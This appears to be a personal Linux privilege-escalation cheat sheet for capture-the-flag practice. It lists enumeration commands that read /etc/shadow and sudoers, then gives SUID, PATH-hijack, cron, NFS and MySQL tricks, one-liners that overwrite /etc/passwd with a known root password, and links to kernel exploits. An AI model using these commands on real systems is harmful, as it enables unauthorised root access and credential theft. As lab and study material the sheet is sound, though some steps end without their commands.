Take your time. Don't try to do too much at once. Remember small steps - don't try to jump to root using rshell. Maybe run a few commands to see what they do
Last updated
Was this helpful?
Once you've found the patch to escalation click here:
https://github.com/Ignitetechnologies/Privilege-Escalation
Create a copy of /bin/bash or /bin/sh can you call it rootbash - make sure its owned by the root user. Then use /bin/bash -p to run it
Questions to ask yourself
What user with what permissions + where am I?
id
pwd
What usernames could I login as?
grep -vE "nologin|false" /etc/passwd
What architecture?
uname -m
Whats running on the machine?
ps aux
look for something(s) that are running which is not standard
What files does the user have permission?
find / -user $USER
find / -name -*$USER* # looks for files with the username in it
What services are running?
netstat -antup
if things are here that are not on the nmap scan - could be a firewall rule blocking it is mysql in there? If so creds will be stored somewhere on the box
What is installed?
dpkg -l | awk '$1 ~ /ii/{print $2,$3}'
rpm -qa
#copy output over to kali and run /scripts/linux/pkg_lookup.sh to find a vulnerable version or do below
Research where creds would be stored on certain webapps
Can you see the shadow file - get lucky?
cat /etc/shadow
What services are running as root?:
ps aux | grep root
Look for vulnerable/privileged components such as: mysql, sudo, udev, python
If /etc/exports if writable, you can add an NFS entry or change and existing entry adding the no_root_squash flag to a root directory, put a binary with SUID bit on, and get root.
If there is a cronjob that runs as run but it has incorrect file permissions, you can change it to run your SUID binary and get a shell.
The following command will list processes running by root, permissions and NFS exports.
echo 'services running as root'; ps aux | grep root; echo 'permissions'; ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
Use netstat to find other machines connected
netstat -ano
Confidential information and users
id
su
sudo -l
cat /etc/passwd
cat /etc/shadow
cat /etc/group
cat /etc/sudoers # who is in there are you?
ls -alh /var/mail/
ls -ahlR /root
ls -ahlR /home/
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 {print $1}' #any other super users?
If you have found a download it to your box and open it in Ghidra. Check the main function to view de-compiled commands interesting binary SUID files / binaries
Things to remember:
Run strings on the binary. Read all of it, don't just read the bottom of the output - read the top. Look for programs that the binary calls like curl. If you spot one then if it doesn't have its full path you can exploit it by modifying the path variable and creating a file with /bin/bash. See box symofonos:1.
The file will run as the owner no matter who executes it. So if root owns it, we can run it and hijack it to become root
ltrace ./binary
# step through binary may result in revealing password if password is needed to run it
Capabilities
Linux capabilities provide a subset of the available root privileges to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation.
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null
find / -perm -1000 -type d 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
In plain English, this command says to find files in the / directory owned by the user root with SUID permission bits (-perm -4000), print them, and then redirect all errors (2 = stderr) to /dev/null (where they get thrown away). The reason for this redirect is that we aren't interested in things that we can't access, and access denied errors can fill up a terminal pretty fast.
Adding a binary to PATH, to hijack another SUID binary invokes it without the fully qualified path.
function /usr/bin/foo () { /usr/bin/echo "It works"; }
export -f /usr/bin/foo
/usr/bin/foo
It works
If you can get root to execute anything, the following will change a binary owner to him and set the SUID flag:
An example here is for instance that you see a local database like mysql is running. Maybe you are able to find credentials for it and log into it locally on the box
If MYSQL is running as root, you can run commands using sys_exec(). For instance, to add user to sudoers:
If /etc/passwd has incorrect permissions, you can root:
echo 'root::0:0:root:/root:/bin/bash' > /etc/passwd; su
or
echo "root:JblITMXA7I1hg:0:0:root:/root:/bin/bash" > /etc/passwd
then su using password rowbot
or
openssl passwd
#put in password, output is random sting
#pass this on the x part of root in /etc/passwd
su root using the password u set
Wildcard injection if there is a cron with a wildcard in the command line, you can create a file, whose name will be passed as an argument to the cron task, For more info:
uname -r : Find Linux kernel version.
cat /proc/version : Show Linux kernel version with help of a special file.
hostnamectl | grep Kernel : For systemd based Linux distro you can use hotnamectl to display hostname and running Linux kernel version.
Always be sure to read the comments in exploits they inform you about which systems and version are vulnerable, which parts of the script need modification & which compilation flags to use. $targetip 32 bit or 64 bit? Be mindful of this when compiling exploits.
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
https://www.exploit-db.com/exploits/37292
CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
